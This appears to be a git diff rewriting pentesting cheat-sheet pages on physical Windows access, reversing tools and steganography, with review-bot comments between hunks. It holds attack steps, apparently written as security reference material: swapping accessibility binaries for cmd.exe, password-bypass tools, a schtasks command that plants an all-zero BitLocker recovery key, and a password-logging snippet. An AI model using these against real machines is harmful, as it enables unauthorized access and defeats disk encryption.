Tools like **Elcomsoft Forensic Disk Decryptor** or **Passware Kit Forensic** can be utilized for this purpose. -* **SETHC:** _sethc.exe_ is invoked when SHIFT is pressed 5 times -* **UTILMAN:** _Utilman.exe_ is invoked by pressing WINDOWS+U -* **OSK:** _osk.exe_ is invoked by pressing WINDOWS+U, then launching the on-screen keyboard -* **DISP:** _DisplaySwitch.exe_ is invoked by pressing WINDOWS+P +### Social Engineering for Recovery Key Addition -These binaries are located inside _**C:\Windows\System32**_. You can **change** any of them for a **copy** of the binary **cmd.exe** (also in the same folder) and any time that you invoke any of those binaries a command prompt as **SYSTEM** will appear. - -### Modifying SAM - -You can use the tool _**chntpw**_ to **modify the** _**SAM**_ **file** of a mounted Windows filesystem. Then, you could change the password of the Administrator user, for example.\ -This tool is available in KALI. - -``` -chntpw -h -chntpw -l -``` - -**Inside a Linux system you could modify the** _**/etc/shadow**_ **or** _**/etc/passwd**_ **file.** - -### **Kon-Boot** - -**Kon-Boot** is one of the best tools around which can log you into Windows without knowing the password. It works by **hooking into the system BIOS and temporarily changing the contents of the Windows kernel** while booting (new versions work also with **UEFI**). It then allows you to enter **anything as the password** during login. 
The next time you start the computer without Kon-Boot, the original password will be back, the temporary changes will be discarded and the system will behave as if nothing has happened.\ -Read More: [https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/) - -It is a live CD/USB that can **patch the memory** so you **won't need to know the password to login**.\ -Kon-Boot also performs the **StickyKeys** trick so you could press _**Shift**_ **5 times to get an Administrator cmd**. - -## **Running Windows** - -### Initial shortcuts - -### Booting shortcuts - -* supr - BIOS -* f8 - Recovery mode -* _supr_ - BIOS ini -* _f8_ - Recovery mode -* _Shitf_ (after the windows banner) - Go to login page instead of autologon (avoid autologon) - -### **BAD USBs** - -#### **Rubber Ducky tutorials** - -* [Tutorial 1](https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Tutorials) -* [Tutorial 2](https://blog.hartleybrody.com/rubber-ducky-guide/) - -#### **Teensyduino** - -* [Payloads and tutorials](https://github.com/Screetsec/Pateensy) - -There are also tons of tutorials about **how to create your own bad USB**. - -### Volume Shadow Copy - -With administrators privileges and powershell you could make a copy of the SAM file.[ See this code](../windows-hardening/basic-powershell-for-pentesters/#volume-shadow-copy). - -## Bypassing Bitlocker - -Bitlocker uses **2 passwords**. The one used by the **user**, and the **recovery** password (48 digits). - -If you are lucky and inside the current session of Windows exists the file _**C:\Windows\MEMORY.DMP**_ (It is a memory dump) you could try to **search inside of it the recovery password**. 
You can **get this file** and a **copy of the filesytem** and then use _Elcomsoft Forensic Disk Decryptor_ to get the content (this will only work if the password is inside the memory dump). You could also **force the memory dump** using _**NotMyFault**_ of _Sysinternals,_ but this will reboot the system and has to be executed as Administrator. - -You could also try a **bruteforce attack** using _**Passware Kit Forensic**_. - -### Social Engineering - -Finally, you could make the user add a new recovery password making him executed as administrator: - -```bash -schtasks /create /SC ONLOGON /tr "c:/windows/system32/manage-bde.exe -protectors -add c: -rp 000000-000000-000000-000000-000000-000000-000000-000000" /tn tarea /RU SYSTEM /f -``` - -This will add a new recovery key (composed of 48 zeros) in the next login. - -To check the valid recovery keys you can execute: - -``` -manage-bde -protectors -get c: -``` +A new BitLocker recovery key can be added through social engineering tactics, convincing a user to execute a command that adds a new recovery key composed of zeros, thereby simplifying the decryption process.
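Review bot: the replacement paragraph under "### Social Engineering for Recovery Key Addition" drops the only actionable parts of the section, the `schtasks /create /SC ONLOGON /tr "c:/windows/system32/manage-bde.exe -protectors -add c: -rp 000000-000000-000000-000000-000000-000000-000000-000000" /tn tarea /RU SYSTEM /f` command and the `manage-bde -protectors -get c:` verification, and replaces them with the vague claim that this "simplif[ies] the decryption process". Keep both commands: the trick only works because the scheduled task runs as SYSTEM, so the user who creates it must be an administrator (the removed text says "executed as administrator"; the new text's "convincing a user" hides that precondition), and `manage-bde -protectors -get c:` is how the reader confirms the all-zero recovery password was actually added at next logon. The same hunk also deletes the SETHC/UTILMAN/OSK/DISP binary-swap trick in `C:\Windows\System32`, `chntpw`, Kon-Boot, the boot shortcuts, the Volume Shadow Copy pointer and the MEMORY.DMP / NotMyFault approach with no replacement; if the goal is condensation, at least the tool names and the accessibility-binary list should survive as a short list, since nothing in the new text covers them.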
diff --git a/reversing/cryptographic-algorithms/README.md b/reversing/cryptographic-algorithms/README.md index 2c225de38..0727006ad 100644 --- a/reversing/cryptographic-algorithms/README.md +++ b/reversing/cryptographic-algorithms/README.md @@ -36,7 +36,7 @@ Compresses and decompresses a given buffer of data. **CryptAcquireContext** -The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. +From [the docs](https://learn.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptacquirecontexta): The **CryptAcquireContext** function is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). **This returned handle is used in calls to CryptoAPI** functions that use the selected CSP. **CryptCreateHash** diff --git a/reversing/reversing-tools-basic-methods/angr/README.md b/reversing/reversing-tools-basic-methods/angr/README.md index 20097b67c..7a512ea78 100644 --- a/reversing/reversing-tools-basic-methods/angr/README.md +++ b/reversing/reversing-tools-basic-methods/angr/README.md @@ -14,6 +14,7 @@ Other ways to support HackTricks:
+Part of this cheatsheet is based on the [angr documentation](https://docs.angr.io/_/downloads/en/stable/pdf/). # Installation diff --git a/reversing/reversing-tools-basic-methods/angr/angr-examples.md b/reversing/reversing-tools-basic-methods/angr/angr-examples.md index 13284b799..458fef0b5 100644 --- a/reversing/reversing-tools-basic-methods/angr/angr-examples.md +++ b/reversing/reversing-tools-basic-methods/angr/angr-examples.md @@ -13,9 +13,11 @@ {% hint style="info" %} -If the program is using \*\*`scanf` \*\* to get **several values at once from stdin** you need to generate a state that starts after the **`scanf`**. +If the program is using `scanf` to get **several values at once from stdin** you need to generate a state that starts after the **`scanf`**. {% endhint %} +Codes taken from [https://github.com/jakespringer/angr_ctf](https://github.com/jakespringer/angr_ctf) + ### Input to reach address (indicating the address) ```python diff --git a/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md b/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md index 41850e960..158dd1edf 100644 --- a/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md +++ b/reversing/reversing-tools-basic-methods/satisfiability-modulo-theories-smt-z3.md @@ -17,6 +17,8 @@ Other ways to support HackTricks: Very basically, this tool will help us to find values for variables that need to satisfy some conditions and calculating them by hand will be so annoying. Therefore, you can indicate to Z3 the conditions the variables need to satisfy and it will find some values (if possible). +**Some texts and examples are extracted from [https://ericpony.github.io/z3py-tutorial/guide-examples.htm](https://ericpony.github.io/z3py-tutorial/guide-examples.htm)** + # Basic Operations ## Booleans/And/Or/Not 
diff --git a/reversing/reversing-tools/README.md b/reversing/reversing-tools/README.md index 9a20700df..8f1ad4ed7 100644 --- a/reversing/reversing-tools/README.md +++ b/reversing/reversing-tools/README.md 
@@ -14,221 +14,98 @@ Other ways to support HackTricks: +# Wasm Decompilation and Wat Compilation Guide -# Wasm decompiler / Wat compiler +In the realm of **WebAssembly**, tools for **decompiling** and **compiling** are essential for developers. This guide introduces some online resources and software for handling **Wasm (WebAssembly binary)** and **Wat (WebAssembly text)** files. -Online: +## Online Tools -* Use [https://webassembly.github.io/wabt/demo/wasm2wat/index.html](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) to **decompile** from wasm \(binary\) to wat \(clear text\) -* Use [https://webassembly.github.io/wabt/demo/wat2wasm/](https://webassembly.github.io/wabt/demo/wat2wasm/) to **compile** from wat to wasm -* you can also try to use [https://wwwg.github.io/web-wasmdec/](https://wwwg.github.io/web-wasmdec/) to decompile +- To **decompile** Wasm to Wat, the tool available at [Wabt's wasm2wat demo](https://webassembly.github.io/wabt/demo/wasm2wat/index.html) comes in handy. +- For **compiling** Wat back to Wasm, [Wabt's wat2wasm demo](https://webassembly.github.io/wabt/demo/wat2wasm/) serves the purpose. +- Another decompilation option can be found at [web-wasmdec](https://wwwg.github.io/web-wasmdec/). -Software: +## Software Solutions -* [https://www.pnfsoftware.com/jeb/demo](https://www.pnfsoftware.com/jeb/demo) -* [https://github.com/wwwg/wasmdec](https://github.com/wwwg/wasmdec) +- For a more robust solution, [JEB by PNF Software](https://www.pnfsoftware.com/jeb/demo) offers extensive features. +- The open-source project [wasmdec](https://github.com/wwwg/wasmdec) is also available for decompilation tasks. -# .Net decompiler +# .Net Decompilation Resources -[https://github.com/icsharpcode/ILSpy](https://github.com/icsharpcode/ILSpy) -[ILSpy plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode): You can have it in any OS \(you can install it directly from VSCode, no need to download the git. 
Click on **Extensions** and **search ILSpy**\). -If you need to **decompile**, **modify** and **recompile** again you can use: [**https://github.com/0xd4d/dnSpy/releases**](https://github.com/0xd4d/dnSpy/releases) \(**Right Click -> Modify Method** to change something inside a function\). -You cloud also try [https://www.jetbrains.com/es-es/decompiler/](https://www.jetbrains.com/es-es/decompiler/) +Decompiling .Net assemblies can be accomplished with tools such as: -## DNSpy Logging +- [ILSpy](https://github.com/icsharpcode/ILSpy), which also offers a [plugin for Visual Studio Code](https://github.com/icsharpcode/ilspy-vscode), allowing cross-platform usage. +- For tasks involving **decompilation**, **modification**, and **recompilation**, [dnSpy](https://github.com/0xd4d/dnSpy/releases) is highly recommended. **Right-clicking** a method and choosing **Modify Method** enables code changes. +- [JetBrains' dotPeek](https://www.jetbrains.com/es-es/decompiler/) is another alternative for decompiling .Net assemblies. -In order to make **DNSpy log some information in a file**, you could use this .Net lines: +## Enhancing Debugging and Logging with DNSpy -```bash +### DNSpy Logging +To log information to a file using DNSpy, incorporate the following .Net code snippet: + +%%%cpp using System.IO; path = "C:\\inetpub\\temp\\MyTest2.txt"; File.AppendAllText(path, "Password: " + password + "\n"); -``` +%%% -## DNSpy Debugging +### DNSpy Debugging +For effective debugging with DNSpy, a sequence of steps is recommended to adjust **Assembly attributes** for debugging, ensuring that optimizations that could hinder debugging are disabled. This process includes changing the `DebuggableAttribute` settings, recompiling the assembly, and saving the changes. -In order to debug code using DNSpy you need to: +Moreover, to debug a .Net application run by **IIS**, executing `iisreset /noforce` restarts IIS. 
To attach DNSpy to the IIS process for debugging, the guide instructs on selecting the **w3wp.exe** process within DNSpy and starting the debugging session. -First, change the **Assembly attributes** related to **debugging**: +For a comprehensive view of loaded modules during debugging, accessing the **Modules** window in DNSpy is advised, followed by opening all modules and sorting assemblies for easier navigation and debugging. -![](../../.gitbook/assets/image%20%287%29.png) +This guide encapsulates the essence of WebAssembly and .Net decompilation, offering a pathway for developers to navigate these tasks with ease. -From: +## **Java Decompiler** +To decompile Java bytecode, these tools can be very helpful: +- [jadx](https://github.com/skylot/jadx) +- [JD-GUI](https://github.com/java-decompiler/jd-gui/releases) -```aspnet -[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)] -``` +## **Debugging DLLs** +### Using IDA +- **Rundll32** is loaded from specific paths for 64-bit and 32-bit versions. +- **Windbg** is selected as the debugger with the option to suspend on library load/unload enabled. +- Execution parameters include the DLL path and function name. This setup halts execution upon each DLL's loading. -To: +### Using x64dbg/x32dbg +- Similar to IDA, **rundll32** is loaded with command line modifications to specify the DLL and function. +- Settings are adjusted to break on DLL entry, allowing breakpoint setting at the desired DLL entry point. -```text -[assembly: Debuggable(DebuggableAttribute.DebuggingModes.Default | -DebuggableAttribute.DebuggingModes.DisableOptimizations | -DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints | -DebuggableAttribute.DebuggingModes.EnableEditAndContinue)] -``` +### Images +- Execution stopping points and configurations are illustrated through screenshots. 
-And click on **compile**: +## **ARM & MIPS** +- For emulation, [arm_now](https://github.com/nongiach/arm_now) is a useful resource. -![](../../.gitbook/assets/image%20%28314%29%20%281%29.png) +## **Shellcodes** +### Debugging Techniques +- **Blobrunner** and **jmp2it** are tools for allocating shellcodes in memory and debugging them with Ida or x64dbg. + - Blobrunner [releases](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5) + - jmp2it [compiled version](https://github.com/adamkramer/jmp2it/releases/) +- **Cutter** offers GUI-based shellcode emulation and inspection, highlighting differences in shellcode handling as a file versus direct shellcode. -Then save the new file on _**File >> Save module...**_: +### Deobfuscation and Analysis +- **scdbg** provides insights into shellcode functions and deobfuscation capabilities. +%%%bash +scdbg.exe -f shellcode # Basic info +scdbg.exe -f shellcode -r # Analysis report +scdbg.exe -f shellcode -i -r # Interactive hooks +scdbg.exe -f shellcode -d # Dump decoded shellcode +scdbg.exe -f shellcode /findsc # Find start offset +scdbg.exe -f shellcode /foff 0x0000004D # Execute from offset +%%% -![](../../.gitbook/assets/image%20%28261%29.png) +- **CyberChef** for disassembling shellcode: [CyberChef recipe](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29) -This is necessary because if you don't do this, at **runtime** several **optimisations** will be applied to the code and it could be possible that while debugging a **break-point is never hit** or some **variables don't exist**. +## **Movfuscator** +- An obfuscator that replaces all instructions with `mov`. +- Useful resources include a [YouTube explanation](https://www.youtube.com/watch?v=2VF_wPkiBJY) and [PDF slides](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf). 
+- **demovfuscator** might reverse movfuscator's obfuscation, requiring dependencies like `libcapstone-dev` and `libz3-dev`, and installing [keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md). -Then, if your .Net application is being **run** by **IIS** you can **restart** it with: +## **Delphi** +- For Delphi binaries, [IDR](https://github.com/crypto2011/IDR) is recommended. -```text -iisreset /noforce -``` - -Then, in order to start debugging you should close all the opened files and inside the **Debug Tab** select **Attach to Process...**: - -![](../../.gitbook/assets/image%20%28166%29.png) - -Then select **w3wp.exe** to attach to the **IIS server** and click **attach**: - -![](../../.gitbook/assets/image%20%28274%29.png) - -Now that we are debugging the process, it's time to stop it and load all the modules. First click on _Debug >> Break All_ and then click on _**Debug >> Windows >> Modules**_: - -![](../../.gitbook/assets/image%20%28210%29.png) - -![](../../.gitbook/assets/image%20%28341%29.png) - -Click any module on **Modules** and selec**t Open All Modules**: - -![](../../.gitbook/assets/image%20%28216%29.png) - -Right click any module in **Assembly Explorer** and click **Sort Assemblies**: - -![](../../.gitbook/assets/image%20%28130%29.png) - -# Java decompiler - -[https://github.com/skylot/jadx](https://github.com/skylot/jadx) -[https://github.com/java-decompiler/jd-gui/releases](https://github.com/java-decompiler/jd-gui/releases) - -# Debugging DLLs - -## Using IDA - -* **Load rundll32** \(64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe\) -* Select **Windbg** debugger -* Select "**Suspend on library load/unload**" - -![](../../.gitbook/assets/image%20%2869%29.png) - -* Configure the **parameters** of the execution putting the **path to the DLL** and the function that you want to call: - -![](../../.gitbook/assets/image%20%28325%29.png) - -Then, when you start debugging **the 
execution will be stopped when each DLL is loaded**, then, when rundll32 load your DLL the execution will be stopped. - -But, how can you get to the code of the DLL that was lodaded? Using this method, I don't know how. - -## Using x64dbg/x32dbg - -* **Load rundll32** \(64bits in C:\Windows\System32\rundll32.exe and 32 bits in C:\Windows\SysWOW64\rundll32.exe\) -* **Change the Command Line** \( _File --> Change Command Line_ \) and set the path of the dll and the function that you want to call, for example: "C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\14.ridii\_2.dll",DLLMain -* Change _Options --> Settings_ and select "**DLL Entry**". -* Then **start the execution**, the debugger will stop at each dll main, at some point you will **stop in the dll Entry of your dll**. From there, just search for the points where you want to put a breakpoint. - -Notice that when the execution is stopped by any reason in win64dbg you can see **in which code you are** looking in the **top of the win64dbg window**: - -![](../../.gitbook/assets/image%20%28181%29.png) - -Then, looking to this ca see when the execution was stopped in the dll you want to debug. - -# ARM & MIPS - -{% embed url="https://github.com/nongiach/arm\_now" %} - -# Shellcodes - -## Debugging a shellcode with blobrunner - -[**Blobrunner**](https://github.com/OALabs/BlobRunner) will **allocate** the **shellcode** inside a space of memory, will **indicate** you the **memory address** were the shellcode was allocated and will **stop** the execution. -Then, you need to **attach a debugger** \(Ida or x64dbg\) to the process and put a **breakpoint the indicated memory address** and **resume** the execution. This way you will be debugging the shellcode. 
- -The releases github page contains zips containing the compiled releases: [https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5](https://github.com/OALabs/BlobRunner/releases/tag/v0.0.5) -You can find a slightly modified version of Blobrunner in the following link. In order to compile it just **create a C/C++ project in Visual Studio Code, copy and paste the code and build it**. - -{% page-ref page="blobrunner.md" %} - -## Debugging a shellcode with jmp2it - -[**jmp2it** ](https://github.com/adamkramer/jmp2it/releases/tag/v1.4)is very similar to blobrunner. It will **allocate** the **shellcode** inside a space of memory, and start an **eternal loop**. You then need to **attach the debugger** to the process, **play start wait 2-5 secs and press stop** and you will find yourself inside the **eternal loop**. Jump to the next instruction of the eternal loop as it will be a call to the shellcode, and finally you will find yourself executing the shellcode. - -![](../../.gitbook/assets/image%20%28403%29.png) - -You can download a compiled version of [jmp2it inside the releases page](https://github.com/adamkramer/jmp2it/releases/). - -## Debugging shellcode using Cutter - -[**Cutter**](https://github.com/rizinorg/cutter/releases/tag/v1.12.0) is the GUI of radare. Using cutter you can emulate the shellcode and inspect it dynamically. - -Note that Cutter allows you to "Open File" and "Open Shellcode". 
In my case when I opened the shellcode as a file it decompiled it correctly, but when I opened it as a shellcode it didn't: - -![](../../.gitbook/assets/image%20%28254%29.png) - -In order to start the emulation in the place you want to, set a bp there and apparently cutter will automatically start the emulation from there: - -![](../../.gitbook/assets/image%20%28402%29.png) - -![](../../.gitbook/assets/image%20%28343%29.png) - -You can see the stack for example inside a hex dump: - -![](../../.gitbook/assets/image%20%28404%29.png) - -## Deobfuscating shellcode and getting executed functions - -You should try [**scdbg**](http://sandsprite.com/blogs/index.php?uid=7&pid=152). -It will tell you things like **which functions** is the shellcode using and if the shellcode is **decoding** itself in memory. - -```bash -scdbg.exe -f shellcode # Get info -scdbg.exe -f shellcode -r #show analysis report at end of run -scdbg.exe -f shellcode -i -r #enable interactive hooks (file and network) and show analysis report at end of run -scdbg.exe -f shellcode -d #Dump decoded shellcode -scdbg.exe -f shellcode /findsc #Find offset where starts -scdbg.exe -f shellcode /foff 0x0000004D #Start the executing in that offset -``` - -scDbg also counts with a graphical launcher where you can select the options you want and execute the shellcode - -![](../../.gitbook/assets/image%20%28401%29.png) - -The **Create Dump** option will dump the final shellcode if any change is done to the shellcode dynamically in memory \(useful to download the decoded shellcode\). The **start offset** can be useful to start the shellcode at a specific offset. The **Debug Shell** option is useful to debug the shellcode using the scDbg terminal \(however I find any of the options explained before better for this matter as you will be able to use Ida or x64dbg\). 
- -## Disassembling using CyberChef - -Upload you shellcode file as input and use the following receipt to decompile it: [https://gchq.github.io/CyberChef/\#recipe=To\_Hex\('Space',0\)Disassemble\_x86\('32','Full%20x86%20architecture',16,0,true,true\)](https://gchq.github.io/CyberChef/#recipe=To_Hex%28'Space',0%29Disassemble_x86%28'32','Full%20x86%20architecture',16,0,true,true%29) - -# [Movfuscator](https://github.com/xoreaxeaxeax/movfuscator) - -This ofuscator change all the instructions for `mov`\(yeah, really cool\). It also uses interruptions to change executions flows. For more information about how does it works: - -* [https://www.youtube.com/watch?v=2VF\_wPkiBJY](https://www.youtube.com/watch?v=2VF_wPkiBJY) -* [https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas\_2015\_the\_movfuscator.pdf](https://github.com/xoreaxeaxeax/movfuscator/blob/master/slides/domas_2015_the_movfuscator.pdf) - -If you are lucky [demovfuscator ](https://github.com/kirschju/demovfuscator)will deofuscate the binary. It has several dependencies - -```text -apt-get install libcapstone-dev -apt-get install libz3-dev -``` - -And [install keystone](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE-NIX.md) \(`apt-get install cmake; mkdir build; cd build; ../make-share.sh; make install`\) - -If you are playing a **CTF, this workaround to find the flag** could be very useful: [https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html](https://dustri.org/b/defeating-the-recons-movfuscator-crackme.html) - -# Delphi - -For Delphi compiled binaries you can use [https://github.com/crypto2011/IDR](https://github.com/crypto2011/IDR) # Courses diff --git a/stego/stego-tricks.md b/stego/stego-tricks.md index 6eead5f38..4db64874c 100644 --- a/stego/stego-tricks.md +++ b/stego/stego-tricks.md 
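Review bot: the new code fences use `%%%cpp` and `%%%bash` instead of the triple backticks used everywhere else in this file (the removed `- ```bash` / `- ``` ` lines show the existing convention), so the DNSpy logging snippet and the scdbg command list will render as literal text; restore backtick fences and tag the DNSpy snippet `csharp`, since `using System.IO; File.AppendAllText(...)` is C#, not C++. While there, the snippet assigns `path = "C:\\inetpub\\temp\\MyTest2.txt";` without declaring it, which does not compile; it needs `string path = ...`. Second, the rewritten DNSpy debugging paragraph tells the reader to change "the `DebuggableAttribute` settings" but deletes the before/after lines (`[assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)]` to the `Default | DisableOptimizations | IgnoreSymbolStoreSequencePoints | EnableEditAndContinue` form) and the reason for doing it (runtime optimisations make breakpoints never hit and variables disappear); keep both. The x64dbg section likewise loses the concrete command line `"C:\Windows\SysWOW64\rundll32.exe" "Z:\shared\Cybercamp\rev2\\14.ridii\_2.dll",DLLMain`, the 64-bit/32-bit rundll32 paths, the `apt-get install libcapstone-dev` / `libz3-dev` lines, and the demovfuscator and dustri CTF links, while the new "### Images" subsection says configurations are "illustrated through screenshots" that this same hunk removes; drop that subsection or keep the images. Finally, "This guide encapsulates the essence of WebAssembly and .Net decompilation..." is filler sitting between the .Net and Java sections and should go.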
@@ -22,71 +22,65 @@ Find vulnerabilities that matter most so you can fix them faster. Intruder track *** -## Extracting data from all files - -### Binwalk - -Binwalk is a tool for searching binary files, like images and audio files, for embedded hidden files and data.\ -It can be installed with `apt`, and the [source](https://github.com/ReFirmLabs/binwalk) can be found on Github.\ -**Useful commands**:\ -`binwalk file` : Displays the embedded data in the given file\ -`binwalk -e file` : Displays and extracts the data from the given file\ -`binwalk --dd ".*" file` : Displays and extracts the data from the given file - -### Foremost - -Foremost is a program that recovers files based on their headers, footers, and internal data structures. I find it especially useful when dealing with png images. You can select the files that Foremost will extract by changing the config file in **/etc/foremost.conf.**\ -It can be installed with `apt`, and the [source](https://github.com/korczis/foremost) can be found on Github.\ -**Useful commands:**\ -`foremost -i file` : extracts data from the given file. 
- -### Exiftool - -Sometimes, important stuff is hidden in the metadata of an image or file; exiftool can be very helpful to view file metadata.\ -You can get it from [here](https://www.sno.phy.queensu.ca/\~phil/exiftool/)\ -**Useful commands:**\ -`exiftool file` : shows the metadata of the given file - -### Exiv2 - -A tool similar to exiftool.\ -It can be installed with `apt`, and the [source](https://github.com/Exiv2/exiv2) can be found on Github.\ -[Official website](http://www.exiv2.org/)\ -**Useful commands:**\ -`exiv2 file` : shows the metadata of the given file - -### File - -Check out what kind of file you have - -### Strings - -Extract strings from the file.\ -Useful commands:\ -`strings -n 6 file`: Extract the strings with min length of 6\ -`strings -n 6 file | head -n 20`: Extract first 20 strings with min length of 6\ -`strings -n 6 file | tail -n 20`: Extract last 20 strings with min length of 6\ -`strings -e s -n 6 file`: Extract 7bit strings\ -`strings -e S -n 6 file`: Extract 8bit strings\ -`strings -e l -n 6 file`: Extract 16bit strings (little-endian)\ -`strings -e b -n 6 file`: Extract 16bit strings (big-endian)\ -`strings -e L -n 6 file`: Extract 32bit strings (little-endian)\ -`strings -e B -n 6 file`: Extract 32bit strings (big-endian) - -### cmp - Comparison - -If you have some **modified** image/audio/video, check if you can **find the exact original one** on the internet, then **compare both** files with: +## **Extracting Data from Files** +### **Binwalk** +A tool for searching binary files for embedded hidden files and data. It's installed via `apt` and its source is available on [GitHub](https://github.com/ReFirmLabs/binwalk). +```bash +binwalk file # Displays the embedded data +binwalk -e file # Extracts the data +binwalk --dd ".*" file # Extracts all data ``` + +### **Foremost** +Recovers files based on their headers and footers, useful for png images. Installed via `apt` with its source on [GitHub](https://github.com/korczis/foremost). 
+```bash +foremost -i file # Extracts data +``` + +### **Exiftool** +Helps to view file metadata, available [here](https://www.sno.phy.queensu.ca/~phil/exiftool/). +```bash +exiftool file # Shows the metadata +``` + +### **Exiv2** +Similar to exiftool, for metadata viewing. Installable via `apt`, source on [GitHub](https://github.com/Exiv2/exiv2), and has an [official website](http://www.exiv2.org/). +```bash +exiv2 file # Shows the metadata +``` + +### **File** +Identify the type of file you're dealing with. + +### **Strings** +Extracts readable strings from files, using various encoding settings to filter the output. +```bash +strings -n 6 file # Extracts strings with a minimum length of 6 +strings -n 6 file | head -n 20 # First 20 strings +strings -n 6 file | tail -n 20 # Last 20 strings +strings -e s -n 6 file # 7bit strings +strings -e S -n 6 file # 8bit strings +strings -e l -n 6 file # 16bit strings (little-endian) +strings -e b -n 6 file # 16bit strings (big-endian) +strings -e L -n 6 file # 32bit strings (little-endian) +strings -e B -n 6 file # 32bit strings (big-endian) +``` + +### **Comparison (cmp)** +Useful for comparing a modified file with its original version found online. +```bash cmp original.jpg stego.jpg -b -l ``` -## Extracting hidden data in text +## **Extracting Hidden Data in Text** -### Hidden data in spaces +### **Hidden Data in Spaces** +Invisible characters in seemingly empty spaces may hide information. To extract this data, visit [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder). 
-If you find that a **text line** is **bigger** than it should be, then some **hidden information** could be included inside the **spaces** using invisible characters.󐁈󐁥󐁬󐁬󐁯󐀠󐁴󐁨\ -To **extract** the **data**, you can use: [https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder](https://www.irongeek.com/i.php?page=security/unicode-steganography-homoglyph-encoder) + + +***
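Review bot: the rewritten "### **Hidden Data in Spaces**" drops the detection hint from the removed text, that a text line being longer than it should be is the tell for invisible characters hidden among the spaces; keep that sentence, since without it the reader has no reason to reach for the decoder. The removed line also carried stray invisible Unicode tag characters after "invisible characters." which the new line rightly omits, but the three empty `+` lines added after the link leave an unexplained blank run before the `***` separator; trim to one. Minor: in the Binwalk block, `binwalk --dd ".*" file # Extracts all data` and `binwalk -e file # Extracts the data` now read as the same thing; the removed comments distinguished them as display-and-extract with a match rule, so say what `--dd ".*"` adds.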
@@ -96,131 +90,135 @@ Get Access Today: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Extracting data from images +*** -### identify +## **Extracting Data from Images** -[GraphicMagick](https://imagemagick.org/script/download.php) tool to check what kind of image a file is. Also checks if the image is corrupted. +### **Identifying Image Details with GraphicMagick** -``` +[GraphicMagick](https://imagemagick.org/script/download.php) serves to determine image file types and identify potential corruption. Execute the command below to inspect an image: + +```bash ./magick identify -verbose stego.jpg ``` -If the image is damaged, you may be able to restore it by simply adding a metadata comment to it (if it's very badly damaged this won't work): +To attempt repair on a damaged image, adding a metadata comment might help: ```bash ./magick mogrify -set comment 'Extraneous bytes removed' stego.jpg ``` -### Steghide \[JPEG, BMP, WAV, AU] +### **Steghide for Data Concealment** -Steghide is a steganography program that hides data in various kinds of image and audio files. It supports the following file formats : `JPEG, BMP, WAV and AU`. It’s also useful for extracting embedded and encrypted data from other files.\ -It can be installed with `apt`, and the [source](https://github.com/StefanoDeVuono/steghide) can be found on Github.\ -**Useful commands:**\ -`steghide info file` : displays info about whether a file has embedded data or not.\ -`steghide extract -sf file [--passphrase password]` : extracts embedded data from a file \[using a password] +Steghide facilitates hiding data within `JPEG, BMP, WAV, and AU` files, capable of embedding and extracting encrypted data. Installation is straightforward using `apt`, and its [source code is available on GitHub](https://github.com/StefanoDeVuono/steghide). 
-You can also extract content from steghide using the web: [https://futureboy.us/stegano/decinput.html](https://futureboy.us/stegano/decinput.html) +**Commands:** +- `steghide info file` reveals if a file contains hidden data. +- `steghide extract -sf file [--passphrase password]` extracts the hidden data, password optional. -**Bruteforcing** Steghide: [stegcracker](https://github.com/Paradoxis/StegCracker.git) `stegcracker []` +For web-based extraction, visit [this website](https://futureboy.us/stegano/decinput.html). -### Zsteg \[PNG, BMP] - -zsteg is a tool that can detect hidden data in png and bmp files.\ -To install it : `gem install zsteg`. The source can also be found on [Github](https://github.com/zed-0xff/zsteg)\ -**Useful commands:**\ -`zsteg -a file` : Runs every detection method on the given file\ -`zsteg -E file` : Extracts data with the given payload (example : zsteg -E b4,bgr,msb,xy name.png) - -### stegoVeritas JPG, PNG, GIF, TIFF, BMP - -Capable of a wide variety of simple and advanced tricks, this tool can check file metadata, create transformed images, brute force LSB, and more. Check out `stegoveritas.py -h` to read about its full capabilities. Execute `stegoveritas.py stego.jpg` to run all checks. - -### Stegsolve - -Sometimes there is a message or a text hidden in the image itself that, in order to view it, must have color filters applied, or some color levels changed. Although you can do that with something like GIMP or Photoshop, Stegsolve makes it easier. It's a small Java tool that applies many useful color filters on images; In CTF challenges, Stegsolve is often a real timesaver.\ -You can get it from [Github](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve)\ -To use it, just open the image and click on the `<` `>` buttons. 
